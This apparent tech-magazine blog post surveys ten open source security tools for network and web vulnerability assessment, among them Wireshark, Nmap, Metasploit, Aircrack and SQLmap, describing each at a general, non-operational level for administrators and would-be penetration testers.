Modern
data centres deploy firewalls and managed networking components, but
still feel insecure because of crackers. Hence, there is a crucial need
for tools that accurately assess network vulnerability. This article
brings you the top 10 assessment tools to address these issues,
categorised based on their popularity, functionality and ease of use.
Vulnerabilities
are unfortunately an integral part of every software and hardware
system. A bug in the operating system, a loophole in a commercial
product, or the misconfiguration of critical infrastructure components
makes systems susceptible to attacks. Malicious techies can penetrate
systems via these vulnerabilities, for personal or commercial gains.
While technically this is not very easy, there have been enough
successful attempts to cause one to worry.
Earlier, it was
believed that this was true only for commercial products. Yet, lately,
open source systems have been cracked, resulting in data theft and a
loss of reputation or money. Apart from local area networks, websites
are also vulnerable and have become the prime target of crackers. In
short, vulnerabilities can be exploited from within the organisation, as
well as over the Internet by unknown people.
On the bright side,
with the number of attacks increasing, there are now a slew of tools to
detect and stop malware and cracking attempts. The open source world has
many such utilities (and distros). Here, I must mention BackTrack Linux,
which has gained international fame for its wide range of vulnerability
assessment and digital forensics software utilities. The most recent
version also contains powerful wireless vulnerability testing tools.
Though
there are literally hundreds of tools, I have selected the top 10 based
on the fact that no other tool can really replace them. The primary
selection criteria have been the feature set, how widespread the product
is within the security community, and simplicity.
Please refer to
Figure 1, which shows the top five tools I chose for network
assessment, while Figure 2 shows the leading Web vulnerability scanning
products. Of course, only FOSS tools are mentioned. I have presented the
tools in the order that they are expected to be used to detect
vulnerabilities; this should provide a systematic approach to readers
who wish to make a career as certified penetration testers.
Figure 1: Top 5 network security scanners
Figure 2: Top 5 web security scanners
The top 5 network security assessment tools
Vulnerability
scanning of a network needs to be done from both within the network as
well as without (from both “sides” of the firewall). The approach I
would suggest is to start from the network evaluation phase, where
sniffing and primary attacks are performed. The gathered data is used in
the attack phase to exploit the exposed vulnerabilities.
Wireshark
The
very first step in vulnerability assessment is to have a clear picture
of what is happening on the network. Wireshark (previously named
Ethereal) works in promiscuous mode to capture all traffic of a TCP
broadcast domain.
Customised filters can be set to intercept
specific traffic; for example, to capture communication between two IP
addresses, or capture UDP-based DNS queries on the network. Traffic data
can be dumped into a capture file, which can be reviewed later.
Additional filters can also be set during the review.
Typically,
the tester is looking for stray IP addresses, spoofed packets,
unnecessary packet drops, and suspicious packet generation from a single
IP address. Wireshark gives a broad and clear picture of what is
happening on the network.
However, it does not have its own
intelligence, and should be used as a data provider. Due to its great
GUI, any person with even some basic knowledge can use it.
Nmap
This
is probably the only tool to remain popular for almost a decade. This
scanner is capable of crafting packets and performing scans to a
granular TCP level, such as SYN scan, ACK scan, etc. It has built-in
signature-checking algorithms to guess the OS and version, based on
network responses such as a TCP handshake.
Nmap is effective
enough to detect remote devices, and in most cases correctly identifies
firewalls, routers, and their make and model. Network administrators can
use Nmap to check which ports are open, and also if those ports can be
exploited further in simulated attacks. The output is plain text and
verbose; hence, this tool can be scripted to automate routine tasks and
to grab evidence for an audit report.
You can read the series of Nmap articles published earlier for better understanding.
Metasploit
Once
sniffing and scanning is done using the above tools, it’s time to go to
the OS and application level. Metasploit is a fantastic, powerful open
source framework that performs rigorous scans against a set of IP
addresses.
Unlike many other frameworks, it can also be used for
anti-forensics. Expert programmers can write a piece of code exploiting a
particular vulnerability, and test it with Metasploit to see if it gets
detected. This process can be reversed technically — when a virus
attacks using some unknown vulnerability, Metasploit can be used to test
the patch for it.
While this is a commercial tool, I have
mentioned it here because the community edition is free, yet makes no
compromises on the feature set.
OpenVAS
The Nessus
scanner is a famous commercial utility, from which OpenVAS branched out
a few years back to remain open source. Though Metasploit and OpenVAS
are very similar, there is still a distinct difference.
OpenVAS is
split into two major components — a scanner and a manager. A scanner
may reside on the target to be scanned and feed vulnerability findings
to the manager. The manager collects inputs from multiple scanners and
applies its own intelligence to create a report.
In the security
world, OpenVAS is believed to be very stable and reliable for detecting
the latest security loopholes, and for providing reports and inputs to
fix them. A built-in Greenbone security assistant provides a GUI
dashboard to list all vulnerabilities and the impacted machines on the
network.
Creating detailed reports is one thing that makes OpenVAS a tool favoured by infrastructure security managers.
Aircrack
The
list of network scanners would be incomplete without wireless security
scanners. Today’s infrastructure contains wireless devices in the data
centre as well as in corporate premises to facilitate mobile users.
While having WPA-2 security is believed to be adequate for 802.11 WLAN
standards, misconfiguration and the use of over-simple passwords leaves
such networks open to attacks.
Aircrack
is a suite of software utilities that acts as a sniffer, packet crafter
and packet decoder. A targeted wireless network is subjected to packet
traffic to capture vital details about the underlying encryption. A
decryptor is then used to brute-force the captured file, and find out
passwords. Aircrack is capable of working on most Linux distros, but the
one in BackTrack Linux is highly preferred.
The top five Web security assessment tools
Scanning
websites is an entirely different ballgame from network scans. In the
case of websites, the scope of the scan ranges from Layer 2 to 7,
considering the intrusiveness of the latest vulnerabilities. The correct
approach for scanning websites starts from Web-level access, right up
to scanning all backend components such as databases. While most Web
security scanners are automated, there could be a need for manual
scripting, based on the situation.
Nikto
Let’s start with
this tool because of its feature set. This open source tool is widely
used to scan websites, mainly because it supports HTTP and HTTPS, and
also provides findings in an interactive fashion. Nikto
can crawl a website just the way a human would, and that too in the
least amount of time. It uses a technique called mutation, whereby it
creates combinations of various HTTP tests together to form an attack,
based on the Web server configuration and the hosted code.
Thus,
it finds critical loopholes such as file upload misconfiguration,
improper cookie handling, cross-scripting errors, etc. Nikto dumps all
findings in a verbose mode, which helps in knowing more about the Web
vulnerabilities, in detail. However, it can also result in too many
things getting notified, some of which may be false alarms. Hence, care
should be taken while interpreting Nikto logs.
Samurai framework
Once a baseline check is performed by Nikto, the next step is to take the “deep-dive” approach. Samurai is a framework — a bunch of powerful utilities, each one targeted for a specific set of vulnerabilities.
It
comes as a Linux distribution, purely focusing on penetration-testing
tools such as WebScarab for HTTP mapping, W3AF plugins for
application-based attacks, and it also has tools to test browser-based
exploits. It is amazing to note that the most recent version can find
vulnerabilities that are usually not detected even by a few commercial
software products.
Safe3 scanner
While the first two tools
are good for static websites, for portals needing user ID and password,
we need something that can deal with HTTP sessions and cookies. Safe3
scanner is a fantastic open source project, which has gained momentum
and fame because it can handle almost all types of authentication,
including NTLM.
It contains a Web crawler (a spider like that of
search engines) capable of ignoring duplicate page scans and yet detect
client-side JavaScript vulnerabilities. Safe3 scans also detect the
possibility of the latest AJAX-based attacks and even report vulnerable
script libraries. It comes with a user-friendly GUI and is capable of
creating nice management reports.
Websecurify
Though very
similar to Samurai, Websecurify also brings application-level assessment
into play. In case of a large Web farm where code is maintained by a
team of developers, following standards can sometimes yield insecure
code like passwords mentioned in code, physical file paths in libraries,
etc. Websecurify can traverse code and find such loopholes swiftly.
A
nice feature is that it allows you to create screenshots of the problem
areas automatically, which helps in preparing audit reports. It is one
of the very few platform-independent tools and also supports mobile
coding, which is helping it get more popular in the cyber-security
assessment world.
SQLmap
Unless I mention a tool to detect
SQL-injection attacks, this article would not be complete. Though this
is a very old “first-generation” type of attack, many public websites
still fail to fix it. SQLmap is capable of not just exploiting
SQL-injection faults, but can also take over the database server. Since
it focuses on a specific task, it works at great speed to fingerprint
databases, find out the underlying file system and OS, and eventually
fetch data from the server. It supports almost all well-known database
engines, and can also perform password-guessing attacks. This tool can
be combined with the other four tools mentioned above to scan a website
aggressively.
A vulnerability assessment tool should include
network scanning as well as website vulnerability exploitation. Open
source software is prone to attacks too; hence, network administrators
must know about the reputed scanners and use them in their daily tasks
to make their infrastructure secure and stable.
No comments:
Post a Comment